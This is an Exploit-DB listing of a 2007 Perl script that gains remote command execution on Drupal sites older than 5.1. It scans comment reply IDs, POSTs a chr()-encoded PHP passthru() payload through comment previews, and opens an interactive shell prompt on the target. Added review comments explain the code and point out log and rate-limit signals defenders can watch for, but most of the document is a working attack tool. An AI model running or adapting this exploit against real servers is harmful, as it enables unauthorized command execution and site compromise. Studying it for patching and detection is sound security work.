Drupal < 5.1 - post comments Remote Command Execution Exploit 2

2007-02-15T00:00:00
ID EDB-ID:3312
Type exploitdb
Reporter str0ke
Modified 2007-02-15T00:00:00

Description

Drupal < 5.1 (post comments) Remote Command Execution Exploit v2. Web application exploit for the PHP platform.

                                        
                                            #!/usr/bin/perl

#
# $Id: milw0rm_drupalv5.pl,v 0.2 2007/02/15 13:40:29 str0ke Exp $
# 
# milw0rm_drupalv5.pl - Drupal < 5.1 Remote Command Execution Exploit
# Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com>
# 
# Description
# -----------
# Previews on comments were not passed through normal form validation routines,
# enabling users with the 'post comments' permission and access to more than one
# input filter to execute arbitrary code. By default, anonymous and authenticated
# users have access to only one input format.
# Immediate workarounds include disabling the comment module, revoking the 'post
# comments' permission for all users, or limiting access to a single input format.
# Versions affected
# -----------------
# - Drupal 5.x versions before Drupal 5.1
#
# [02/15/2007] The exploit has been fixed. /str0ke
#

use strict;
use LWP::UserAgent;

# Command-line handling: [host] is mandatory (falls through to usage(), which
# exits), [directory] defaults to "/drupal", [proxy] is optional.
my $host  = shift || &usage;
my $dir   = shift || "/drupal";
my $proxy = shift;
# File-scope buffer for the interactive loop at the bottom of the script; note
# that exploit() declares its own lexical $command which shadows this one.
my $command;

# NOTE(review): "-&gt;" throughout this listing is an HTML-escaped "->"; the
# script as shown here does not parse until the entities are restored.
my $conn = LWP::UserAgent-&gt;new();
# Double negation: only set an HTTP proxy when one was given (i.e. "if $proxy").
$conn -&gt; proxy("http", "http://".$proxy."/") unless !$proxy;

# Print the command-line synopsis and terminate. Reached via "&usage" when no
# host argument is supplied; the "&" call form sidesteps the empty prototype.
sub usage() 
{
	my @synopsis = (
		"[?] Drupal &lt; 5.1 Remote Command Execution Exploit",
		"[?] Copyright (c) 2007 str0ke &lt;str0ke[!]milw0rm.com&gt;",
		"[?] usage: perl $0 [host] [directory] [proxy]",
		"    [host] (ex. www.milw0rm.com)",
		"    [directory] (ex. /drupal)",
		"    [proxy] (ex. 0.0.0.0:8080)",
	);
	print "$_\n" for @synopsis;
	exit;
}

# Submit one command through the comment-preview handler and print what comes
# back.
#   $_[0]  comment/reply id located by the scan at the bottom of the script
#   $_[1]  shell command to run; defaults to 'ls -l'
# From a defender's side, the request built here is the thing to alert on: a
# POST to ?q=comment/reply/<id> whose form fields carry op=Preview comment, a
# non-default format=2 and PHP tags in the comment body (see the header for the
# root cause and the permission/format workarounds).
sub exploit() 
{
	my $i = $_[0];
	my $command = $_[1] || 'ls -l';
	# Wrap the command output in markers so it can be cut out of the HTML reply.
	my $cmd     = 'echo start_er;'.$command.';'.'echo end_er';

	# Every byte becomes chr(N) joined by '.', so the literal command text never
	# appears in the request body -- log searches should match on the PHP call
	# pattern in the comment field, not on command names. The map block assigns
	# to $_, which also rewrites the temporary list it iterates (Perl::Critic
	# would flag this; harmless here).
	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
	
	# HTTP::Request is not imported explicitly; presumably loaded by
	# LWP::UserAgent. "-&gt;", "=&gt;", "&lt;" and "&gt;" below are HTML-escaped
	# "->", "=>", "<" and ">" from the listing.
	my $req = HTTP::Request-&gt;new(POST =&gt; "http://" . $host . $dir . "/?q=comment/reply/" . $i);
	$req -&gt; content_type('application/x-www-form-urlencoded');
	$req -&gt; content('subject=My daddy beats me&comment=&lt;?passthru('.$byte.');?&gt;&format=2&form_id=comment_form&op=Preview comment');

	my $content = $conn-&gt;request($req);
	
	# Non-greedy capture between the markers; /s lets it span lines.
	if ($content-&gt;content =~ m/start_er(.*?)end_er/ms) {
		my $out = $1;

		if ($out) {
			print "$out\n";
		} else {
			# Markers present but nothing between them is treated as failure,
			# so a command with empty output also ends the whole session.
			print "[-] Exploit Failed...\n";
			exit;
		}	
	}	
	# No markers in the reply at all: returns silently, nothing is printed.
}

# Scan comment/reply ids 1..400 for a page offering "add new comment"; the
# first hit is used for an interactive command loop and the script then exits.
# Up to 400 sequential GETs to ?q=comment/reply/<id> from one client is a burst
# a rate limiter or web log review can pick up before any POST is made.
for my $i ( 1 .. 400 ) {
	my $output = $conn -&gt; get("http://" . $host . $dir . "/?q=comment/reply/" . $i);

	if($output -&gt; is_success)
	{
		if($output -&gt; content =~ /add new comment/)
		{
			print "[+] found comment/reply: $i\n";

			# First call runs exploit()'s default command as a probe. The "&"
			# call form bypasses the empty "()" prototype on sub exploit(),
			# which would otherwise reject arguments.
			&exploit($i);
			
			# Read-eval loop; "while()" with an empty condition runs forever.
			# An empty line, or EOF on STDIN (undef), ends the session.
			while()
			{
				print "str0kin-drupal\$ ";
				chomp($command = &lt;STDIN&gt;);
				exit unless $command;
				&exploit($i, $command);
			}
			exit;
		}
	}
}

# Reached only when no id in 1..400 produced a matching page; the inner
# branch above exits before getting here.
print "[-] Exploit Failed...\n";

# milw0rm.com [2007-02-15]